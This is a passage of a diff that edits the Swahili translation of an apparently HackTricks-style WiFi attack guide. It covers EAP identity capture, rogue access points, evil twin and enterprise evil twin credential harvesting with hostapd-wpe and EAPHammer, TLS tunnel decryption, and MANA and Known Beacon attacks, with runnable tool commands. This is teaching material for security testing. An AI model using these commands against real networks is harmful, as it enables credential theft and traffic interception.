usalama na vipengele vya usimamizi. Unapokuwa unatumia zana kama `airodump-ng` kuchunguza trafiki ya mtandao, unaweza kuona vitambulisho vya aina hizi za uthibitishaji. Mbinu zingine maarufu ni: +Katika **mipangilio ya WiFi ya biashara, utapata njia mbalimbali za uthibitishaji**, kila moja ikitoa viwango tofauti vya usalama na vipengele vya usimamizi. Unapokuwa unatumia zana kama `airodump-ng` kuchunguza trafiki ya mtandao, unaweza kuona vitambulisho vya aina hizi za uthibitishaji. Njia zingine za kawaida ni: ``` 6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi ``` @@ -407,7 +407,7 @@ Unaweza kupata maelezo zaidi kuhusu hizi mbinu za uthibitisho [hapa](https://en. ### Username Capture -Kusoma [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27) inaonekana kama unatumia **EAP** ujumbe wa **"Identity"** lazima uwe **unasaidiwa**, na **jina la mtumiaji** litatumwa kwa **wazi** katika ujumbe wa **"Response Identity"**. +Kusoma [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27) inaonekana kama unatumia **EAP** ujumbe wa **"Identity"** lazima uwe **umeungwa mkono**, na **jina la mtumiaji** litatumwa kwa **wazi** katika ujumbe wa **"Response Identity"**. Hata ukitumia moja ya mbinu za uthibitisho salama zaidi: **PEAP-EAP-TLS**, inawezekana **kukamata jina la mtumiaji lililotumwa katika itifaki ya EAP**. Ili kufanya hivyo, **kamateni mawasiliano ya uthibitisho** (anzisha `airodump-ng` ndani ya channel na `wireshark` katika interface hiyo hiyo) na chujio pakiti kwa `eapol`.\ Ndani ya pakiti ya "**Response, Identity**", **jina la mtumiaji** la mteja litajitokeza. @@ -416,19 +416,19 @@ Ndani ya pakiti ya "**Response, Identity**", **jina la mtumiaji** la mteja litaj ### Anonymous Identities -Kuficha utambulisho kunasaidiwa na EAP-PEAP na EAP-TTLS. Katika muktadha wa mtandao wa WiFi, ombi la EAP-Identity kwa kawaida huanzishwa na kituo cha ufikiaji (AP) wakati wa mchakato wa ushirikiano. Ili kuhakikisha ulinzi wa kutotambulika kwa mtumiaji, jibu kutoka kwa mteja wa EAP kwenye kifaa cha mtumiaji kina taarifa muhimu pekee zinazohitajika kwa seva ya RADIUS ya awali kushughulikia ombi. Dhana hii inaonyeshwa kupitia hali zifuatazo: +Kuficha utambulisho kunasaidiwa na EAP-PEAP na EAP-TTLS. Katika muktadha wa mtandao wa WiFi, ombi la EAP-Identity kwa kawaida huanzishwa na kituo cha ufikiaji (AP) wakati wa mchakato wa ushirikiano. Ili kuhakikisha ulinzi wa kutotambulika kwa mtumiaji, jibu kutoka kwa mteja wa EAP kwenye kifaa cha mtumiaji kina taarifa muhimu tu zinazohitajika kwa seva ya RADIUS ya awali kushughulikia ombi. Dhana hii inaonyeshwa kupitia hali zifuatazo: * EAP-Identity = anonymous * Katika hali hii, watumiaji wote wanatumia "anonymous" kama kitambulisho chao cha mtumiaji. Seva ya RADIUS ya awali inafanya kazi kama seva ya EAP-PEAP au EAP-TTLS, inayohusika na usimamizi wa upande wa seva wa itifaki ya PEAP au TTLS. Njia ya uthibitisho ya ndani (iliyolindwa) inashughulikiwa kwa ndani au kupelekwa kwa seva ya RADIUS ya mbali (nyumbani). * EAP-Identity = anonymous@realm\_x -* Katika hali hii, watumiaji kutoka maeneo tofauti wanaficha utambulisho wao huku wakionyesha maeneo yao husika. Hii inaruhusu seva ya RADIUS ya awali kupeleka maombi ya EAP-PEAP au EAP-TTLS kwa seva za RADIUS katika maeneo yao ya nyumbani, ambazo zinafanya kazi kama seva ya PEAP au TTLS. Seva ya RADIUS ya awali inafanya kazi kama node ya relay ya RADIUS pekee. +* Katika hali hii, watumiaji kutoka maeneo tofauti wanaficha utambulisho wao huku wakionyesha maeneo yao husika. Hii inaruhusu seva ya RADIUS ya awali kupeleka maombi ya EAP-PEAP au EAP-TTLS kwa seva za RADIUS katika maeneo yao ya nyumbani, ambazo zinafanya kazi kama seva ya PEAP au TTLS. Seva ya RADIUS ya awali inafanya kazi kama node ya kuhamasisha RADIUS pekee. * Vinginevyo, seva ya RADIUS ya awali inaweza kufanya kazi kama seva ya EAP-PEAP au EAP-TTLS na ama kushughulikia njia ya uthibitisho iliyolindwa au kupeleka kwa seva nyingine. Chaguo hili linarahisisha usanidi wa sera tofauti kwa maeneo mbalimbali. -Katika EAP-PEAP, mara handaki ya TLS inapoundwa kati ya seva ya PEAP na mteja wa PEAP, seva ya PEAP inaanzisha ombi la EAP-Identity na kulipitisha kupitia handaki ya TLS. Mteja anajibu ombi hili la pili la EAP-Identity kwa kutuma jibu la EAP-Identity lililo na utambulisho wa kweli wa mtumiaji kupitia handaki iliyofichwa. Njia hii inazuia kwa ufanisi kufichuliwa kwa utambulisho halisi wa mtumiaji kwa yeyote anayesikiliza trafiki ya 802.11. +Katika EAP-PEAP, mara handaki ya TLS inapoundwa kati ya seva ya PEAP na mteja wa PEAP, seva ya PEAP inaanzisha ombi la EAP-Identity na kutuma kupitia handaki ya TLS. Mteja anajibu ombi hili la pili la EAP-Identity kwa kutuma jibu la EAP-Identity linalojumuisha utambulisho wa kweli wa mtumiaji kupitia handaki iliyofichwa. Njia hii inazuia kwa ufanisi kufichuliwa kwa utambulisho halisi wa mtumiaji kwa yeyote anayesikiliza trafiki ya 802.11. EAP-TTLS inafuata utaratibu tofauti kidogo. Kwa EAP-TTLS, mteja kwa kawaida hujithibitisha kwa kutumia PAP au CHAP, iliyolindwa na handaki ya TLS. Katika kesi hii, mteja anajumuisha sifa ya User-Name na ama sifa ya Password au CHAP-Password katika ujumbe wa awali wa TLS uliopelekwa baada ya kuanzishwa kwa handaki. -Bila kujali itifaki iliyochaguliwa, seva ya PEAP/TTLS inapata maarifa ya utambulisho wa kweli wa mtumiaji baada ya kuanzishwa kwa handaki ya TLS. Utambulisho wa kweli unaweza kuwakilishwa kama user@realm au kwa urahisi user. Ikiwa seva ya PEAP/TTLS pia inawajibika kwa uthibitishaji wa mtumiaji, sasa ina utambulisho wa mtumiaji na inaendelea na njia ya uthibitisho iliyolindwa na handaki ya TLS. Vinginevyo, seva ya PEAP/TTLS inaweza kupeleka ombi jipya la RADIUS kwa seva ya RADIUS ya nyumbani ya mtumiaji. Ombi hili jipya la RADIUS halijumuishi safu ya itifaki ya PEAP au TTLS. Katika hali ambapo njia ya uthibitisho iliyolindwa ni EAP, ujumbe wa ndani wa EAP unapelekwa kwa seva ya RADIUS ya nyumbani bila kifuniko cha EAP-PEAP au EAP-TTLS. Sifa ya User-Name ya ujumbe wa RADIUS unaotoka ina utambulisho wa kweli wa mtumiaji, ikibadilisha User-Name isiyojulikana kutoka kwa ombi la RADIUS linalokuja. Wakati njia ya uthibitisho iliyolindwa ni PAP au CHAP (inayosaidiwa tu na TTLS), sifa ya User-Name na sifa nyingine za uthibitisho zilizopatikana kutoka kwa mzigo wa TLS zinabadilishwa katika ujumbe wa RADIUS unaotoka, zikiondoa User-Name isiyojulikana na sifa za TTLS EAP-Message zilizopatikana katika ombi la RADIUS linalokuja. +Bila kujali itifaki iliyochaguliwa, seva ya PEAP/TTLS inapata maarifa ya utambulisho wa kweli wa mtumiaji baada ya kuanzishwa kwa handaki ya TLS. Utambulisho wa kweli unaweza kuwakilishwa kama user@realm au kwa urahisi user. Ikiwa seva ya PEAP/TTLS pia inawajibika kwa uthibitishaji wa mtumiaji, sasa ina utambulisho wa mtumiaji na inaendelea na njia ya uthibitisho iliyolindwa na handaki ya TLS. Vinginevyo, seva ya PEAP/TTLS inaweza kupeleka ombi jipya la RADIUS kwa seva ya RADIUS ya nyumbani ya mtumiaji. Ombi hili jipya la RADIUS halijumuishi safu ya itifaki ya PEAP au TTLS. Katika hali ambapo njia ya uthibitisho iliyolindwa ni EAP, ujumbe wa ndani wa EAP unapelekwa kwa seva ya RADIUS ya nyumbani bila kifuniko cha EAP-PEAP au EAP-TTLS. Sifa ya User-Name ya ujumbe wa RADIUS unaotoka ina utambulisho wa kweli wa mtumiaji, ikibadilisha User-Name isiyojulikana kutoka kwa ombi la RADIUS linalokuja. Wakati njia ya uthibitisho iliyolindwa ni PAP au CHAP (inayoungwa mkono tu na TTLS), sifa ya User-Name na sifa nyingine za uthibitisho zilizopatikana kutoka kwa mzigo wa TLS zinabadilishwa katika ujumbe wa RADIUS unaotoka, zikiondoa User-Name isiyojulikana na sifa za TTLS EAP-Message zilizopatikana katika ombi la RADIUS linalokuja. Kwa maelezo zaidi angalia [https://www.interlinknetworks.com/app\_notes/eap-peap.htm](https://www.interlinknetworks.com/app\_notes/eap-peap.htm) @@ -450,24 +450,24 @@ Unaweza pia kufanya shambulio hili kwa kutumia `eaphammer`: ### Network Selection and Roaming -* Protokali ya 802.11 inaelezea jinsi kituo kinavyoungana na Seti ya Huduma Iliyoongezwa (ESS) lakini haijabainisha vigezo vya kuchagua ESS au kituo cha upatikanaji (AP) ndani yake. +* Protokali ya 802.11 inaelezea jinsi kituo kinajiunga na Seti ya Huduma Iliyoongezwa (ESS) lakini haijabainisha vigezo vya kuchagua ESS au kituo cha upatikanaji (AP) ndani yake. * Vituo vinaweza kuhamahama kati ya APs zinazoshiriki ESSID sawa, kudumisha muunganisho katika jengo au eneo. * Protokali inahitaji uthibitisho wa kituo kwa ESS lakini haijalazimisha uthibitisho wa AP kwa kituo. ### Preferred Network Lists (PNLs) -* Vituo vinaweka ESSID ya kila mtandao wa wireless wanaoungana nao katika Orodha ya Mtandao wa Kipaumbele (PNL), pamoja na maelezo maalum ya usanidi wa mtandao. -* PNL inatumika kuungana kiotomatiki na mitandao inayojulikana, kuboresha uzoefu wa mtumiaji kwa kuboresha mchakato wa muunganisho. +* Vituo vinaweka ESSID ya kila mtandao wa wireless wanaounganisha katika Orodha yao ya Mtandao wa Kipaumbele (PNL), pamoja na maelezo maalum ya usanidi wa mtandao. +* PNL inatumika kuunganishwa kiotomatiki na mitandao inayojulikana, kuboresha uzoefu wa mtumiaji kwa kurahisisha mchakato wa muunganisho. ### Passive Scanning * APs huangaza mara kwa mara fremu za beacon, kutangaza uwepo wao na sifa, ikiwa ni pamoja na ESSID ya AP isipokuwa matangazo yamezimwa. -* Wakati wa skanning ya passively, vituo husikiliza fremu za beacon. Ikiwa ESSID ya beacon inalingana na kipengee katika PNL ya kituo, kituo kinaweza kuungana kiotomatiki na AP hiyo. -* Ufahamu wa PNL ya kifaa unaruhusu uwezekano wa unyakuzi kwa kuiga ESSID ya mtandao unaojulikana, kumdanganya kifaa kuungana na AP mbaya. +* Wakati wa skanning ya passively, vituo husikiliza fremu za beacon. Ikiwa ESSID ya beacon inalingana na kipengee katika PNL ya kituo, kituo kinaweza kuunganishwa kiotomatiki na AP hiyo. +* Ufahamu wa PNL ya kifaa unaruhusu uwezekano wa unyakuzi kwa kuiga ESSID ya mtandao unaojulikana, kumdanganya kifaa kuunganishwa na AP mbaya. ### Active Probing -* Utafutaji wa kazi unahusisha vituo kutuma maombi ya uchunguzi ili kugundua APs za karibu na sifa zao. +* Utafutaji wa kazi unahusisha vituo kutuma maombi ya uchunguzi kugundua APs za karibu na sifa zao. * Maombi ya uchunguzi yaliyolengwa yanaelekeza ESSID maalum, kusaidia kugundua ikiwa mtandao fulani uko ndani ya upeo, hata kama ni mtandao uliofichwa. * Maombi ya uchunguzi ya matangazo yana uwanja wa SSID wa sifuri na yanatumwa kwa APs zote za karibu, ikiruhusu kituo kuangalia mtandao wowote wa kipaumbele bila kufichua maudhui ya PNL yake. @@ -481,7 +481,7 @@ Kwa kutumia `ifconfig -a` angalia kwamba kiolesura cha wlan cha kuunda AP na kio ```bash apt-get install dnsmasq #Manages DHCP and DNS ``` -Tengeneza faili la config `/etc/dnsmasq.conf`: +Tengeneza faili la usanidi `/etc/dnsmasq.conf`: ```ini interface=wlan0 dhcp-authoritative @@ -498,7 +498,7 @@ Kisha **weka IPs** na **njia**: ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 ``` -Na kisha **anzisha** dnsmasq: +Na kisha **anza** dnsmasq: ```bash dnsmasq -C dnsmasq.conf -d ``` @@ -524,7 +524,7 @@ wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1 ``` -**Acha michakato inayokera**, weka **hali ya ufuatiliaji**, na **anzisha hostapd**: +**Acha michakato inayokera**, weka **hali ya ufuatiliaji**, na **anza hostapd**: ```bash airmon-ng check kill iwconfig wlan0 mode monitor @@ -539,13 +539,13 @@ echo 1 > /proc/sys/net/ipv4/ip_forward ``` ## Evil Twin -Shambulio la evil twin linatumia njia ambavyo wateja wa WiFi wanatambua mitandao, hasa kwa kutegemea jina la mtandao (ESSID) bila kuhitaji kituo cha msingi (access point) kujithibitisha kwa mteja. Vidokezo muhimu ni: +Attack ya evil twin inatumia jinsi wateja wa WiFi wanavyotambua mitandao, hasa kwa kutegemea jina la mtandao (ESSID) bila kuhitaji kituo cha msingi (access point) kujithibitisha kwa mteja. Vidokezo muhimu ni: -* **Ugumu wa Kutofautisha**: Vifaa vinakumbana na changamoto ya kutofautisha kati ya vituo halali na vya udanganyifu wanaposhiriki ESSID na aina ya usimbaji sawa. Mitandao halisi mara nyingi hutumia vituo vingi vyenye ESSID sawa ili kuongeza eneo la kufunika bila mshono. -* **Kuhamahama kwa Wateja na Manipulasi ya Muunganisho**: Itifaki ya 802.11 inaruhusu vifaa kuhamahama kati ya vituo ndani ya ESS moja. Washambuliaji wanaweza kutumia hii kwa kuvutia kifaa kuacha kuunganishwa na kituo chake cha msingi na kuunganishwa na kituo cha udanganyifu. Hii inaweza kufanikishwa kwa kutoa ishara yenye nguvu zaidi au kuharibu muunganisho na kituo halali kupitia mbinu kama vile pakiti za deauthentication au kuingilia. -* **Changamoto katika Utekelezaji**: Kutekeleza shambulio la evil twin kwa mafanikio katika mazingira yenye vituo vingi vilivyowekwa vizuri kunaweza kuwa changamoto. Kuondoa uthibitisho wa kituo kimoja halali mara nyingi husababisha kifaa kuunganishwa na kituo kingine halali isipokuwa mshambuliaji anaweza kuondoa uthibitisho wa vituo vyote vya karibu au kuweka kwa mkakati kituo cha udanganyifu. +* **Ugumu wa Kutofautisha**: Vifaa vinakumbana na changamoto ya kutofautisha kati ya vituo halali na vya udanganyifu wanaposhiriki ESSID na aina ya usimbaji sawa. Mitandao halisi mara nyingi hutumia vituo vingi vyenye ESSID sawa ili kupanua eneo la huduma bila mshono. +* **Kuhamahama kwa Wateja na Manipulation ya Muunganisho**: Itifaki ya 802.11 inaruhusu vifaa kuhamahama kati ya vituo ndani ya ESS moja. Washambuliaji wanaweza kutumia hii kwa kuvutia kifaa kuacha kuungana na kituo chake cha msingi na kuungana na kituo cha udanganyifu. Hii inaweza kufanikishwa kwa kutoa ishara yenye nguvu zaidi au kuharibu muunganisho na kituo halali kupitia mbinu kama vile pakiti za deauthentication au jamming. +* **Changamoto katika Utekelezaji**: Kutekeleza kwa mafanikio shambulio la evil twin katika mazingira yenye vituo vingi vilivyowekwa vizuri kunaweza kuwa changamoto. Kuondoa uthibitisho wa kituo kimoja halali mara nyingi husababisha kifaa kuungana na kituo kingine halali isipokuwa mshambuliaji anaweza kuondoa uthibitisho wa vituo vyote vya karibu au kuweka kwa mkakati kituo cha udanganyifu. -Unaweza kuunda Evil Twin ya Kawaida (bila uwezo wa kuelekeza trafiki kwenye Mtandao) kwa kufanya: +Unaweza kuunda Evil Twin ya wazi sana (bila uwezo wa kuelekeza trafiki kwenye Mtandao) kwa kufanya: ```bash airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon ``` @@ -557,7 +557,7 @@ Au kutumia Airgeddon: `Options: 5,6,7,8,9 (ndani ya menyu ya shambulio la Evil T ![](<../../.gitbook/assets/image (1088).png>) -Tafadhali, zingatia kwamba kwa kawaida ikiwa ESSID katika PNL imehifadhiwa kama iliyo na ulinzi wa WPA, kifaa hakiwezi kuungana moja kwa moja na Evil Twin ya wazi. Unaweza kujaribu DoS AP halisi na kut hope kwamba mtumiaji ataungana kwa mikono na Evil Twin yako ya wazi, au unaweza DoS AP halisi na kutumia WPA Evil Twin ili kukamata handshake (ukitumia njia hii huwezi kumruhusu mwathirika kuungana na wewe kwani hujui PSK, lakini unaweza kukamata handshake na kujaribu kuikata). +Tafadhali, zingatia kwamba kwa kawaida ikiwa ESSID katika PNL imehifadhiwa kama iliyo na ulinzi wa WPA, kifaa hakitaji kuungana moja kwa moja na Evil Twin ya wazi. Unaweza kujaribu DoS AP halisi na kut hope kwamba mtumiaji ataungana kwa mikono na Evil Twin yako ya wazi, au unaweza DoS AP halisi na kutumia WPA Evil Twin ili kukamata handshake (ukitumia njia hii huwezi kumruhusu mwathirika kuungana na wewe kwani hujui PSK, lakini unaweza kukamata handshake na kujaribu kuikata). _Some OS and AV will warn the user that connect to an Open network is dangerous..._ @@ -569,11 +569,11 @@ Unaweza kuunda **Evil Twin kwa kutumia WPA/2** na ikiwa vifaa vimewekwa kuungana ``` ### Enterprise Evil Twin -Ili kuelewa mashambulizi haya, ningependekeza usome kabla ya muhtasari [maelezo ya WPA Enterprise](./#wpa-enterprise-mgt). +Ili kuelewa mashambulizi haya, ningependekeza usome kabla ya muhtasari [WPA Enterprise explanation](./#wpa-enterprise-mgt). -**Kutumia hostapd-wpe** +**Using hostapd-wpe** -`hostapd-wpe` inahitaji **faili ya usanidi** ili kufanya kazi. Ili **kujiandaa** kuzalisha usanidi huu unaweza kutumia [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (pakua faili ya python ndani ya _/etc/hostapd-wpe/_). +`hostapd-wpe` inahitaji **configuration** file ili kufanya kazi. Ili **automate** uzalishaji wa hizi configurations unaweza kutumia [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (pakua faili ya python ndani ya _/etc/hostapd-wpe/_). ```bash ./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com hostapd-wpe ./victim/victim.conf -s @@ -590,7 +590,7 @@ Katika faili la usanidi unaweza kuchagua mambo mengi tofauti kama ssid, channel, # Launch Attack ./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds ``` -Kwa default, EAPHammer inakusudia mbinu hizi za uthibitishaji (angalia GTC kama ya kwanza kujaribu kupata nywila za wazi na kisha matumizi ya mbinu za uthibitishaji zenye nguvu zaidi): +Kwa default, EAPHammer inakusudia mbinu hizi za uthibitishaji (angalia GTC kama ya kwanza kujaribu kupata nywila za maandiko na kisha matumizi ya mbinu za uthibitishaji zenye nguvu zaidi): ``` GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5 ``` @@ -613,20 +613,20 @@ Or you could also use: ### Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks -_Njia hii ilijaribiwa katika muunganisho wa PEAP lakini kwa kuwa ninakivunja kifungu chochote cha TLS, hii inapaswa pia kufanya kazi na EAP-TTLS_ +_Hii mbinu ilijaribiwa katika muunganisho wa PEAP lakini kwa kuwa ninakifungua kifungu chochote cha TLS, hii inapaswa pia kufanya kazi na EAP-TTLS_ Ndani ya **configuration** ya _hostapd-wpe_ **toa maoni** mstari unao na _**dh\_file**_ (kutoka `dh_file=/etc/hostapd-wpe/certs/dh` hadi `#dh_file=/etc/hostapd-wpe/certs/dh`)\ Hii itafanya `hostapd-wpe` **kubadilishana funguo kwa kutumia RSA** badala ya DH, hivyo utaweza **kufungua** trafiki baadaye **ukijua funguo binafsi za seva**. -Sasa anzisha **Evil Twin** ukitumia **`hostapd-wpe`** na ile mipangilio iliyobadilishwa kama kawaida. Pia, anzisha **`wireshark`** katika **interface** inayofanya shambulio la Evil Twin. +Sasa anzisha **Evil Twin** ukitumia **`hostapd-wpe`** na ile configuration iliyobadilishwa kama kawaida. Pia, anzisha **`wireshark`** katika **interface** inayofanya shambulio la Evil Twin. -Sasa au baadaye (wakati tayari umekamata baadhi ya nia za uthibitishaji) unaweza kuongeza funguo binafsi za RSA kwa wireshark katika: `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...` +Sasa au baadaye (wakati tayari umekamata baadhi ya nia za uthibitishaji) unaweza kuongeza funguo binafsi za RSA kwenye wireshark katika: `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...` -Ongeza kipengele kipya na jaza fomu hii: **IP address = yoyote** -- **Port = 0** -- **Protocol = data** -- **Key File** (**chagua faili yako ya funguo**, ili kuepuka matatizo chagua faili ya funguo **isiyo na ulinzi wa nywila**). +Ongeza kipengele kipya na jaza fomu hii na thamani hizi: **IP address = yoyote** -- **Port = 0** -- **Protocol = data** -- **Key File** (**chagua faili yako ya funguo**, ili kuepuka matatizo chagua faili ya funguo **bila kuwa na ulinzi wa nywila**). ![](<../../.gitbook/assets/image (687).png>) -Na angalia **"Decrypted TLS" tab** mpya: +Na angalia kwenye **"Decrypted TLS" tab** mpya: ![](<../../.gitbook/assets/image (231).png>) @@ -634,16 +634,16 @@ Na angalia **"Decrypted TLS" tab** mpya: ### ESSID and MAC black/whitelists -Aina tofauti za Orodha za Filter za Upatikanaji wa Vyombo vya Habari (MFACLs) na njia zao zinazohusiana na athari kwenye tabia ya Kituo cha Upatikanaji (AP) kisicho halali: +Aina tofauti za Orodha za Filter za Udhibiti wa Upatikanaji wa Vyombo (MFACLs) na njia zao zinazohusiana na athari kwenye tabia ya Upatikanaji wa Pointi (AP) wa uhalifu: 1. **MAC-based Whitelist**: -* AP kisicho halali kitajibu tu maombi ya uchunguzi kutoka kwa vifaa vilivyotajwa kwenye orodha ya kibali, kikiwa kisichoonekana kwa wengine wote ambao hawajatajwa. +* AP wa uhalifu utaweza kujibu tu maombi ya uchunguzi kutoka kwa vifaa vilivyotajwa kwenye orodha ya kibali, kubaki kuwa hauonekani kwa wengine wote ambao hawajatajwa. 2. **MAC-based Blacklist**: -* AP kisicho halali kitapuuzilia mbali maombi ya uchunguzi kutoka kwa vifaa vilivyoko kwenye orodha ya mblacklist, hivyo kufanya AP kisicho halali kisionekane kwa vifaa maalum hivyo. +* AP wa uhalifu utaweza kupuuza maombi ya uchunguzi kutoka kwa vifaa vilivyoko kwenye orodha ya mblacklist, hivyo kufanya AP wa uhalifu kuwa hauonekani kwa vifaa maalum. 3. **SSID-based Whitelist**: -* AP kisicho halali kitajibu tu maombi ya uchunguzi kwa ESSIDs maalum zilizoorodheshwa, hivyo kufanya kisichoonekana kwa vifaa ambavyo Orodha zao za Mitandao ya Kichaguo (PNLs) hazina ESSIDs hizo. +* AP wa uhalifu utaweza kujibu maombi ya uchunguzi tu kwa ESSIDs maalum zilizoorodheshwa, hivyo kuwa hauonekani kwa vifaa ambavyo Orodha zao za Mitandao ya Kichaguo (PNLs) hazina ESSIDs hizo. 4. **SSID-based Blacklist**: -* AP kisicho halali hakitajibu maombi ya uchunguzi kwa ESSIDs maalum kwenye orodha ya mblacklist, hivyo kufanya kisichoonekana kwa vifaa vinavyotafuta mitandao hiyo maalum. +* AP wa uhalifu hataweza kujibu maombi ya uchunguzi kwa ESSIDs maalum kwenye orodha ya mblacklist, hivyo kuwa hauonekani kwa vifaa vinavyotafuta mitandao hiyo maalum. ```bash # example EAPHammer MFACL file, wildcards can be used 09:6a:06:c8:36:af @@ -669,21 +669,21 @@ Hii mbinu inaruhusu **mshambuliaji kuunda pointi ya ufikiaji (AP) mbaya inayojib ### MANA -Kisha, **vifaa vilianza kupuuza majibu ya mitandao yasiyoombwa**, kupunguza ufanisi wa shambulio la karma la awali. Hata hivyo, mbinu mpya, inayojulikana kama **shambulio la MANA**, ilianzishwa na Ian de Villiers na Dominic White. Mbinu hii inahusisha AP mbaya **kukamata Orodha za Mitandao ya Kichaguo (PNL) kutoka kwa vifaa kwa kujibu maombi yao ya uchunguzi wa matangazo** kwa majina ya mitandao (SSIDs) ambayo yalikuwa yameombwa awali na vifaa. Shambulio hili la kisasa linapita ulinzi dhidi ya shambulio la karma la awali kwa kutumia njia ambayo vifaa vinakumbuka na kuipa kipaumbele mitandao inayojulikana. +Kisha, **vifaa vilianza kupuuza majibu ya mitandao yasiyoombwa**, kupunguza ufanisi wa shambulio la awali la karma. Hata hivyo, mbinu mpya, inayojulikana kama **shambulio la MANA**, ilianzishwa na Ian de Villiers na Dominic White. Mbinu hii inahusisha AP mbaya **kukamata Orodha za Mitandao ya Kichaguo (PNL) kutoka kwa vifaa kwa kujibu maombi yao ya uchunguzi wa matangazo** kwa majina ya mitandao (SSIDs) ambayo yalikuwa yameombwa awali na vifaa. Shambulio hili la kisasa linapita ulinzi dhidi ya shambulio la awali la karma kwa kutumia njia ambavyo vifaa vinakumbuka na kuipa kipaumbele mitandao inayojulikana. -Shambulio la MANA linafanya kazi kwa kufuatilia maombi ya uchunguzi yaliyolengwa na matangazo kutoka kwa vifaa. Kwa maombi yaliyolengwa, linaandika anwani ya MAC ya kifaa na jina la mtandao lililoombwa, na kuongeza habari hii kwenye orodha. Wakati ombi la matangazo linapopokelewa, AP inajibu kwa habari inayolingana na mitandao yoyote kwenye orodha ya kifaa, ikivutia kifaa kuungana na AP mbaya. +Shambulio la MANA linafanya kazi kwa kufuatilia maombi ya uchunguzi yaliyolengwa na matangazo kutoka kwa vifaa. Kwa maombi yaliyolengwa, linaandika anwani ya MAC ya kifaa na jina la mtandao lililoombwa, na kuongeza taarifa hii kwenye orodha. Wakati ombi la matangazo linapopokelewa, AP inajibu kwa taarifa inayolingana na mitandao yoyote kwenye orodha ya kifaa, ikivutia kifaa kuungana na AP mbaya. ```bash ./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds] ``` ### Loud MANA -A **Loud MANA attack** ni mkakati wa hali ya juu kwa wakati ambapo vifaa havitumii uchunguzi ulioelekezwa au wakati Orodha zao za Mtandao Zinazopendekezwa (PNL) hazijulikani kwa mshambuliaji. Inafanya kazi kwa kanuni kwamba **vifaa katika eneo moja vina uwezekano wa kushiriki majina fulani ya mtandao katika PNL zao**. Badala ya kujibu kwa kuchagua, shambulio hili linatangaza majibu ya uchunguzi kwa kila jina la mtandao (ESSID) lililopatikana katika PNL zilizochanganywa za vifaa vyote vilivyoangaliwa. Njia hii pana inaongeza nafasi ya kifaa kutambua mtandao wa kawaida na kujaribu kuungana na Ndugu ya Upatikanaji (AP) isiyo halali. +A **Loud MANA attack** ni mkakati wa hali ya juu kwa wakati ambapo vifaa havitumii uchunguzi ulioelekezwa au wakati Orodha zao za Mtandao wa Kichaguo (PNL) hazijulikani kwa mshambuliaji. Inafanya kazi kwa kanuni kwamba **vifaa katika eneo moja vina uwezekano wa kushiriki majina fulani ya mtandao katika PNL zao**. Badala ya kujibu kwa kuchagua, shambulio hili linatangaza majibu ya uchunguzi kwa kila jina la mtandao (ESSID) lililopatikana katika PNL zilizochanganywa za vifaa vyote vilivyoangaliwa. Njia hii pana inaongeza nafasi ya kifaa kutambua mtandao wa kawaida na kujaribu kuungana na Kituo cha Upatikanaji (AP) kisicho halali. ```bash ./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds] ``` ### Known Beacon attack -Wakati **Loud MANA attack** inaweza kutosha, **Known Beacon attack** inatoa njia nyingine. Njia hii **inatumia nguvu za kikatili katika mchakato wa kuungana kwa kuiga AP inayojibu jina lolote la mtandao, ikizunguka kwenye orodha ya ESSIDs zinazowezekana** zilizotokana na orodha ya maneno. Hii inasimulia uwepo wa mitandao mingi, ikitumai kulinganisha ESSID ndani ya PNL ya mwathirika, ikichochea jaribio la kuungana na AP iliyoundwa. Shambulio linaweza kuimarishwa kwa kulinganisha na chaguo la `--loud` kwa jaribio kali zaidi la kuwakamata vifaa. +Wakati **Loud MANA attack** inaweza kutosha, **Known Beacon attack** inatoa njia nyingine. Njia hii **inatumia nguvu za kuungana kwa kuiga AP inayojibu jina lolote la mtandao, ikizunguka kwenye orodha ya ESSIDs zinazowezekana** zilizotokana na orodha ya maneno. Hii inaiga uwepo wa mitandao mingi, ikitumai kulinganisha ESSID ndani ya PNL ya mwathirika, ikichochea jaribio la kuungana na AP iliyoundwa. Shambulio linaweza kuimarishwa kwa kuunganisha na chaguo la `--loud` kwa jaribio kali zaidi la kuwakamata vifaa. Eaphammer ilitekeleza shambulio hili kama shambulio la MANA ambapo ESSIDs zote ndani ya orodha zinachajiwa (unaweza pia kuunganisha hii na `--loud` ili kuunda Loud MANA + Known beacons attack): ```bash @@ -691,7 +691,7 @@ Eaphammer ilitekeleza shambulio hili kama shambulio la MANA ambapo ESSIDs zote n ``` **Known Beacon Burst attack** -Attack ya **Known Beacon Burst** inahusisha **kupeleka kwa haraka fremu za beacon kwa kila ESSID iliyoorodheshwa katika faili**. Hii inaunda mazingira yenye msongamano wa mitandao ya uwongo, ikiongeza sana uwezekano wa vifaa kuungana na AP ya uasi, hasa inapounganishwa na shambulio la MANA. Mbinu hii inatumia kasi na kiasi kuishinda mitambo ya uchaguzi wa mtandao ya vifaa. +Shambulio la **Known Beacon Burst** linahusisha **kupeleka kwa haraka fremu za beacon kwa kila ESSID iliyoorodheshwa katika faili**. Hii inaunda mazingira yenye msongamano wa mitandao ya uwongo, ikiongeza sana uwezekano wa vifaa kuungana na AP ya uasi, hasa inapounganishwa na shambulio la MANA. Mbinu hii inatumia kasi na kiasi kuishinda mitambo ya uchaguzi wa mtandao ya vifaa. ```bash # transmit a burst of 5 forged beacon packets for each entry in list ./forge-beacons -i wlan1 \ @@ -704,17 +704,17 @@ Attack ya **Known Beacon Burst** inahusisha **kupeleka kwa 